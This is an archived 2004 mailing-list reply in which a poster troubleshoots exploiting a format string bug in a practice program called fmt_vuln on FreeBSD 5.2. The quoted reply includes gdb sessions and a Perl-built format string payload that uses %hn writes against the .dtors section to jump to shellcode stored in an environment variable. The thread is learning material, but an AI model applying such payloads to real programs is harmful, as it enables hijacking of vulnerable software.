Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT

From: Ganbold (ganbold_at_micom.mng.net)
Date: 08/02/04

  • Next message: Arpa Net: "Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT" 
    Date: Mon, 02 Aug 2004 11:37:54 +0900
To: Vlad902 <vlad902@gmail.com>

    Thank you for quick answer.

    However when I try to get EGG in gdb I get:

    bash-2.05b$ uname -msr
    FreeBSD 5.2-CURRENT i386

    bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
    08049828 d __DTOR_END__

    bash-2.05b$ ./getenvaddr EGG
    EGG is located at 0xbfbfe557

    bash-2.05b$ gdb -q ./fmt_vuln
    (no debugging symbols found)...(gdb)
    (gdb) x/1s 0xbfbfe557
    0xbfbfe557: <Address 0xbfbfe557 out of bounds>
    (gdb)

    What should I do in this case? Why it says "Address out of bounds"?

    Ganbold

    At 09:24 AM 31.07.2004, you wrote:
    >-bash-2.05b$ uname -msr
    >FreeBSD 5.2.1-RC2 i386
    >-bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c
    >-bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
    >08049848 d __DTOR_END__
    >-bash-2.05b$ gdb -q ./fmt_vuln
    >(no debugging symbols found)...(gdb)
    >(gdb) x/1s 0xbfbfedf5
    >0xbfbfedf5: "EGG=vlad902"
    >(gdb) b * 0xbfbfedf9
    >Breakpoint 1 at 0xbfbfedf9
    >(gdb) run `perl -e 'print
    >"\x4a\x98\x04\x08\xff\xff\xff\xff\xee\xee\xee\xee\x48\x98\x04\x08" .
    >"%.49045u%.8x%.8x%.8x.%x%hn%x%.11826u%hn%x"'`
    >..
    >[*] test_val @ 0x0804979c = -72 0xffffffb8
    >(no debugging symbols found)...(no debugging symbols found)...
    >Breakpoint 1, 0xbfbfedf9 in ?? ()
    >
    >
    > > Can somebody give me some hints, advices and guides?
    >Only advice I can give you is do it by hand rather then having tools
    >do it for you. Although while exploiting it beware, I found the stack
    >is very quirky which is why I seem to have so many useless %x s'
    >lieing around
    >
    > -vlad902

  • Next message: Arpa Net: "Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT"